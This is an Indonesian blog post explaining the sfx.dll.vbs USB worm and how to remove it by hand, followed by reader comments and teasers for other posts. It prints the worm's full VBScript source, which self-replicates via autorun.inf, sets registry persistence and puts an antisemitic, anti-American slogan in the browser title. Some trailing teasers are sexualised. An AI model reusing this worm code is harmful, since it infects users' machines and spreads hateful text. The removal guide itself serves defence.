Skip to main content

Virus sfx.dll.vbs

By

Aku perhatikan sekarang lagi banyak beredar nih virus sfx.dll.vbs... emang tidak berbahaya sih.. tapi menyebalkan aja... ciri2nya adalah kalo buka internet explorer (bukan firefox) akan muncul tulisan Bantai Yahudi!!!! Hancurkan Amerika!!! [Bantai Axe gank dan antek2nya!!! SFX harus menang!!!!



http://blinkeredthinker.files.wordpress.com/2007/02/jihad_mobile.jpg



Berikut ini adalah cara pembasmian manual yang aku temukan di internet.. kemaren ini aku kena dan aku cobain tuh langsung trik pembasmian ini dah berhasil... coba di baca dengan baik dan benar ok?




Bantai Yahudi!!!! Hancurkan Amerika!!!

[Bantai Axe gank dan antek2nya!!! SFX harus menang!!!!

Tuesday, November 27, 2007, 01:15 PM - General


yup...notebook saya kena virus yang menyebalkan. Sebenarnya virus ini tidak begitu berbahaya tapi menyebalkan saja, karena akan muncul tulisan "Bantai Yahudi!!!! Hancurkan Amerika!!! [Bantai Axe gank dan antek2nya!!! SFX harus menang!!!!" di title bar Internet Explorer.





kok saya bisa kena? yah karena ada seorang kawan yg meminjam notebook saya (entah apa yg dia lakukan sampe-sampe IE saya jadi kayak gitu).



ok...time to investigate apa yang sebenernya nih virus lakukan. Pertama pastinya adalah dengan menyalakan Hide protected operating system files (recommended) yang terdapat di Tools > Folder Options > Tab View kenapa? karena pada umumnya virus pake tipe data seperti ini biar gak keliatan...cieee!!!





kedua mari kita lihat ternyata terdapat file autorun.inf dan sfx.dll.vbs...yuu!!! mari kita liat isi file autorun.inf:



[autorun]
shellexecute=wscript.exe sfx.dll.vbs



mungkin kalau ditranslate adalah jalankan file sfx.dll.vbs dengan menggunakan wscript.exe ya ampyuuunnnn...ngeri ih huahahahaha...



nah sekarang lihat file kedua yaitu sfx.dll.vbs:



on error resume next
Rem 121206, do u still remember dis day us_3?
Dim src, winpath, flashdrive, fs, mf, atr, tf, rg, nt, check, sd:atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe sfx.dll.vbs":Set fs = CreateObject("Scripting.FileSystemObject"): Set mf = fs.getfile(Wscript.ScriptFullname): Dim text, size: size = mf.size: check = mf.drive.drivetype: Set text = mf.openastextstream(1, -2)
Do While Not text.atendofstream: src=src&text.readline: src = src & vbCrLf: Loop
Do: Set winpath = fs.getspecialfolder(0): Set tf = fs.getfile(winpath & "\sfx.dll.vbs"): tf.Attributes = 32: Set tf = fs.createtextfile(winpath & "\sfx.dll.vbs", 2, True): tf.write src: tf.Close: Set tf = fs.getfile(winpath & "\sfx.dll.vbs"): tf.Attributes = 39
For Each flashdrive In fs.drives
If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And flashdrive.Path <> "A:" Then: Set tf = fs.getfile(flashdrive.Path & "\sfx.dll.vbs"): tf.Attributes = 32: Set tf = fs.createtextfile(flashdrive.Path & "\sfx.dll.vbs", 2, True): tf.write src: tf.Close: Set tf = fs.getfile(flashdrive.Path & "\sfx.dll.vbs"): tf.Attributes = 39: Set tf = fs.getfile(flashdrive.Path & "\autorun.inf"): tf.Attributes = 32: Set tf = fs.createtextfile(flashdrive.Path & "\autorun.inf", 2, True): tf.write atr: tf.Close: Set tf = fs.getfile(flashdrive.Path & "\autorun.inf"): tf.Attributes = 39: End If
Next
Set rg = CreateObject("WScript.Shell"): rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\mcafee",winpath & "\sfx.dll.vbs": rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", "Bantai Yahudi!!!! Hancurkan Amerika!!! [Bantai Axe gank dan antek2nya!!! SFX harus menang!!!!]": rg.regwrite "HKCR\vbsfile\DefaultIcon", "shell32.dll,2"
If check <> 1 Then Wscript.sleep 200000
Loop While check <> 1: Set sd = CreateObject("Wscript.shell"): sd.run winpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname



bingung cara bacanya? gak usah ini gampang banget, ceritanya virus ini sih mau nyebarnya lewat flashdisk dengan langsung menjalankan autorun.inf tadi dan menjalankan file sfx.dll.vbs dengan memanfaatkan kelemahan pengguna Mikocok Windong. Sekarang perhatikan dari



Set rg = CreateObject("WScript.Shell"): rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\mcafee",winpath & "\sfx.dll.vbs": rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", "Bantai Yahudi!!!! Hancurkan Amerika!!! [Bantai Axe gank dan antek2nya!!! SFX harus menang!!!!]": rg.regwrite "HKCR\vbsfile\DefaultIcon", "shell32.dll,2"



sebelum menghilangkan virus ini pertama-tama matikan dahulu wscript.exe dari Task Manager (CTRL+ALT+DEL)





kemudian hapus file autorun.in dan sfx.dll.vbs dari tiap drive. Dan hapus KEY yang ada di registry.



ini yang lumayan penting, virus ini mencoba membuat KEY di registry kita yang pertama adalah:
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\mcafee",winpath & "\sfx.dll.vbs"
hapus KEY mcafee",winpath & "\sfx.dll.vbs"





kedua adalah:
"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", "Bantai Yahudi!!!! Hancurkan Amerika!!! [Bantai Axe gank dan antek2nya!!! SFX harus menang!!!!]"
hapus KEY WindowTitle



ketiga adalah:
"HKEY_CLASSES_ROOT\vbsfile\DefaultIcon", "shell32.dll,2"
hapus KEY DefaultIcon





setelah itu restart windong anda dan Plug and Pray!!!




Nah sekarang trik dan tips dari aku nih :-P



Komputer aku jarang kena virus... kenapa? karena aku gak pernah pake yg aneh2 dari si Windows.. ha.ha.ha..




  1. Aku gak pernah pake fasilitas thumbnail dari windows (ada virus yang lewat situ)

  2. Aku selalu show all files dan matiin hidden protected file di folder options spy kalo ada file virus langsung ketauan

  3. Aku gak pernah double klik icon HD / CD / Flashdisk di my computer.. selalu lewat explorer biasa.. yang isinya sebelah kiri folder2 berjejeran dan sebelah kanan isi foldernya...

  4. di tambah lagi aku matiin tuh semua fasilitas autorun di windows... caranya lewat registry... ini bermanfaat banget karena ada virus2 seperti yang ini (sfx.dll.vbs) menggunakan autorun dari windows untuk langsung pindah ke komputer kita. Autorun ini juga langsung jalan kalo kita double klik icon HD / CD / Flashdisk seperti di no 3.





Itu tips dan triksnya... jangan lupa antivirus yang autoupdate penting banget... aku pake comodo antivirus dan ini lumayan bagus loh.. cuma virus2 kacangan yg mengganggu doank tapi tidak merusak kayak virus ini dia kagak detect.. dan aku pikir antivirus yang laen juga belum tentu bisa detect loh...

Labels:

Comments

  1. MacanMay 10, 2008 at 6:09 AM

    wuih...kalau orang awam computer kayaknya takut juga bantai2x gituan. Mending jual notebook windowsnya lalu beli macbook. Jamin lancar2xa aja deh... (Y)

    ReplyDelete
  2. MoconaMay 10, 2008 at 6:12 AM

    Ha.ha.ha. gelow... (Y) (Y) (Y)

    ReplyDelete
  3. MacanMay 10, 2008 at 6:14 AM

    bang..itu yg di bagasi kotak coklat teh apa? laptop? :-S

    ReplyDelete
  4. MoconaMay 10, 2008 at 6:19 AM

    Mana aku tau Will? ha.ha.ha. orang2 gila itu cuma pengen jihad dan masukin cewek2 ke bagasi mobil.. ha.ha.ha. (N) (N) (N) (N)

    ReplyDelete
  5. Eveline RoseMay 10, 2008 at 7:45 AM

    Virus gelo!
    aku paling benci banget sama jihad-jihatan dan antek2nya....!!!!

    ReplyDelete
  6. montoxJune 29, 2008 at 12:03 AM

    Mirip virus jaman purba DENZUKO.. hehehe... jadi inget dulu pas jaman pakai komputer XT, sambil bertanya2, "Kenapa komputer gw ngga ada tulisan DENZUKO ya pas CTRL-ALT-DEL...???"

    ReplyDelete

Post a Comment

Popular posts from this blog

Ahli / Tukang Urut di Bandung

By
Bagi yang pernah kecelakaan, keseleo, tulang keluar dari persendian, patah tulang, dan masalah-masalah lain dengan tulang dan otot, ahli urut atau tukang urut adalah seseorang yang kita andalkan untuk pengobatan alternatif diluar kedokteran. Persepsi masyarakat mengenai lembaga rumah sakit dan kedokteran masih terdapat kebimbangan walau sudah lebih lebih baik dibanding 10 tahun lalu. Masih ada pemikiran dokter + rumah sakit lebih mementingkan test-test yang berlebihan untuk pasien. Disinilah celah yang diisi oleh ahli urut. Ahli urut berperan sebagai seorang dokter dan ahli terapi. Perlu diperhatikan, menurut saya, sebaiknya tetap ke dokter dulu, x-ray kalau memang diperlukan. Apabila tulang retak atau patah, sebaiknya kunjungan ke ahli urut ditunda dulu. Berikut daftar Ahli urut yang berhasil dihimpun berkat teman2 di facebook...
65 comments
Read more

German Olympic Women Athletes Pose for Playboy

By
Source: www.GutterUncensored.com German Olympic female stars have posed nude for the cover of Playboy, threatening to overshadow their team’s efforts at the Beijing Games. Four female athletes representing Germany in the 2008 Beijing Olympics took their clothes off for Playboy . As I have said before, the Beijing Olympics should be called the Sex Olympics with a full boob slip nipple slips of during a Water Polo game and with a leaked nude sex scandal pictures of Laure Manaudou , a French Olympic gold medalist swimmer. Screw the gold and show more pink is my advice to these German babes. See All Their Naked Photos Below But this is the first time ever four Athletes have stripped off their clothes in Playboy for 4 separate covers. The athletes are, in order of appearance below, Romy Tarangul (Judo), Petra Niemann (sailing), Katharina Sholz (field hockey), and Nicole Reinhardt (Kayak). The topless photos of these German Olympians have appeared on four alternative front covers ...
1 comment
Read more

ExoticAzza : Virly

By
Find out the differences between NonaManis.com, MoreNonaManis.com, ExoticAzza.com and IndoAmateurs.com - read our FAQ or go to  NonaManis.com . Your email program/account might have a spam filter which mistakenly marks our emails as spam. Please make sure to add admin@exoticazza.com, admin@indoamateurs.com and admin@morenonamanis.com to your safe senders list. WARNING: ADULT MATERIALS FOR CONSENTING ADULTS OVER 21 YEARS OF AGE
Post a Comment
Read more